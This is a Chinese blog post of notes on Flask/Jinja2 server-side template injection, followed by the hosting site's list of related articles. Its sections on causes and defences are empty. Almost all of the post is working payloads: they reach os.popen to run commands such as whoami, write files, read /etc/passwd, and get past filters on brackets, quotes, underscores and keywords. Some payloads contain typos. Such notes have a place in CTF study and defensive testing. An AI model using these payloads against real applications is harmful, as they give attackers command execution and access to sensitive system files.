flask ssti

最新推荐文章于 2023-12-03 19:21:24 发布
最新推荐文章于 2023-12-03 19:21:24 发布
阅读量2.1k 收藏
点赞数
分类专栏: 安全 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kimojinmmp/article/details/123936353
版权

1.漏洞成因:

2.漏洞防御:

3.漏洞利用:

subclasses()[59]:是找到重载过的__init__类(在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的)

(1)''.__class__.__mro__[2].__subclasses__()[40]("/root/桌面/test.txt", "a").write("123")

(2)''.__class__.__mro__[2].__subclasses__([59].__init__.__globals__['__uiltins__']['eval']('__import__("os").popen("whoami").read()')

(3)[].__class__.__base__.__subclasses__([59].__init__.__globals__['linecache'].__dict__.values()[12].__dict__.values()[144]('whoami')}

(4){}.__class__.__bases__[0].__subclasses__([59].__init__.__globals__['__builtins__']['__import__']('os').popen('whoami').read()

(5)#注入摸板
{%for c in %27%27.__class__.__base__.__subclasses__()%}
	{%if c.__name__ == %27catch_warnings%27%}
	{{c.__init__.__globals__[%27__builtins__%27]['eval']
	('__import__("os").	popen("ipconfig").read()')}}
	{%endif%}
{%endfor%}

4.摸板函数:

class 获取所属类
bases 获取基类
mro 此属性是在方法解析期间寻找基类时考虑的类元组
subclasses() 返回object的子类
globals 函数会以字典类型返回当前位置的全部全局变量 与 func_globals 等价

5.过滤绕过:

#1.过滤中括号
{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('whoami').read()

#把[59]换为.pop[59]
#过滤引号
#request.args 是flask中的一个属性,为返回请求的参数,这里把path当作变量名,将后面的路径传值进来,进而绕过了引号的过滤
{{().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(request.args.path).read()}}&path=/etc/passwd
#过滤双下划线
#同样利用request.args属性
{{ ''[request.args.class][request.args.mro][2][request.args.subclasses]()[40]('/etc/passwd').read() }}&class=__class__&mro=__mro__&subclasses=__subclasses__
#将其中的request.args改为request.values则利用post的方式进行传参
#GET:
{{ ''[request.value.class][request.value.mro][2][request.value.subclasses]()[40]('/etc/passwd').read() }}
#POST:
class=__class__&mro=__mro__&subclasses=__subclasses__
#过滤关键字
#base64编码绕过
__getattribute__使用实例访问属性时,调用该方法
#例如被过滤掉__class__关键词
{{[].__getattribute__('X19jbGFzc19f'.decode('base64')).__base__.__subclasses__()[40]("/etc/passwd").read()}}
#字符串拼接绕过
{{[].__getattribute__('__c'+'lass__').__base__.__subclasses__()[40]("/etc/passwd").read()}}
kimojinmmp
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于flaskSSTI注入
Kr的博客
01-21 7137
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
SSTI-flask
unexpectedthing的博客
11-27 513
文章目录前言flask基础SSTI简介魔术方法命令执行文件读取通用命令执行过滤bypass参考文献 前言 从极客大挑战中一道题,虽然挺简单的,但是自己发现在模板注入中有很多不懂的东西。 flask基础 先理解flask的流程明白 from flask import flask @app.route('/index/') def hello_word(): return 'hello word' 其中@app.route(’/index/’),是将函数跟url绑定起来,当你访问http://xxx
Flask-SSTI注入
qq_51922767的博客
09-28 1830
一.概述 SSTI即服务端模板注入,是指用户输入的参数被服务端当成模板语言进行了渲染,从而导致代码执行。 1.Flask Flask是一个基于python开发的web 框架。也就是说 Flask 为你提供工具,库和技术来允许你构建一个web应用程序。这个wdb应用程序可以使一些 web 页面、博客、wiki或商业网站。 Flask 属于微框架(micro-framework)这一类别,微架构通常是很小的不依赖于外部库的框架。这既有优点也有缺点,优点是框架很轻量,更新时依赖少,并且专注安全方面的 bug,缺
SSTI学习(Flask)
yaoge1225的博客
07-19 173
SSTI学习(Flask) 本地环境docker vulhub from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') t = Template("Hello " + name) return t.render() if __na
Python Flask应用之SSTI初探
qq_38755190的博客
01-28 548
Falsk是什么? Flask是一个轻量级的可定制框架,使用Python语言编写,较其他同类型框架更为灵活、轻便、安全且容易上手。它可以很好地结合MVC模式进行开发,开发人员分工合作,小型团队在短时间内就可以完成功能丰富的中小型网站或Web服务的实现。 Flask最重要的特点。Flask的两个主要核心应用是Werkzeug和模板引擎Jinja。 Flask的安装 我用的是windows系统,在装有python的系统上,直接打开cmd窗口,我们输入一下命令: pip install Flask
SSTI
03-09
**SSTI(Server-Side Template Injection)**是一种严重的网络安全漏洞,主要出现在使用服务器端模板引擎的Web应用程序中。这种漏洞允许攻击者注入恶意代码到服务器端模板,从而执行任意服务器端代码,获取敏感信息...
fenjing工具,ssti
最新发布
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
flaskssti:测试SSTI
02-21
标题中的“flaskssti”指的是一个与Python web框架Flask相关的项目,可能是一个扩展或教程,专注于“SSTI”(Server-Side Template Injection,服务器端模板注入)。SSTI是一种安全漏洞,允许攻击者通过操纵模板引擎...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
flaskssti模版注入
ZhShy
01-16 494
文章目录ssti漏洞成因模板引擎服务端模板注入flask环境本地搭建route装饰器路由main 入口模板渲染 ssti漏洞成因 一些框架使用了渲染函数时,由于代码的不规范或者信任了用户输入而导致了服务端模板注入。 模板渲染并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。 模板引擎 模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,大大提升了开发效率,使代码重用变得更加容易。但是往往新的开发都会导致一些安全问题,虽然模板引擎会提供沙箱机制,但同样存在沙箱逃逸
flask ssti-subprocess.Popen(8-18)
Realiy的博客
08-18 800
学习文章 [CSCCTF 2019 Qual]FlaskLight get方法请求结合题目试试ssti 说明确实存在ssti 读取文件成功但是读不了app.py,命令执行也被禁止,看看大佬怎么bypass的 先写个脚本爆出可利用的类 import requests import re import html import time index = 0 for i in range(170, 1000): try: url = "http://aa86b4ee.
Flask SSTI漏洞介绍及利用
JCPS_Y的博客
10-23 2658
Flask SSTI漏洞介绍及利用
Python Flask SSTI 之 长度限制绕过
weixin_43995419的博客
09-12 966
Python flask SSTI 之 长度限制绕过
flask模板注入(ssti),一篇就够了
热门推荐
qq_59950255的博客
03-02 1万+
1.什么是flask? flask是用python编写的一个轻量web开发框架 2.ssti成因 flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入 本地演示(需要自行安装flask,requests模块) 通过输入参数key可以进行简单的渲染,创造新的网页 当我们把render_template 换成render_template_string后,并对参数不进行处理 看看结果 代码执.
Flask SSTI
ZXT02的博客
12-03 98
Flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入。
[CTF的PASSBY]浅谈FLASK-jinja2 SSTI 的绕过
qq_64201116的博客
07-04 2241
我目前了解的后端的三大语言,基于php,基于java,基于python,这篇文章就来浅浅谈谈关于python构造的flask过滤SSTI不严谨导致的SSTI注入
flask ssti 的一些黑名单绕过姿势
qq_40800734的博客
06-29 2835
转自https://p0sec.net/index.php/archives/120/ 最近学flaskssti,看到一些比较好的文章,分享并记录学习一下 0x00 获取基本类 首先通过str、dict、tuple或list获取python的基本类(当然也可以利用一些其他在jinja2中存在的对象,比如request): ''.__class__.__mro__[2] {}.__class__.__bases__[0] ().__class__.__bases__[0] [].__clas.
SSTI详解 一文了解SSTI和所有常见payload 以flask模板为例
闵行小鱼塘
10-13 5507
做的ctf题里有好几道跟SSTI有关,故对SSTI进行学习,在此做个小结与记录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值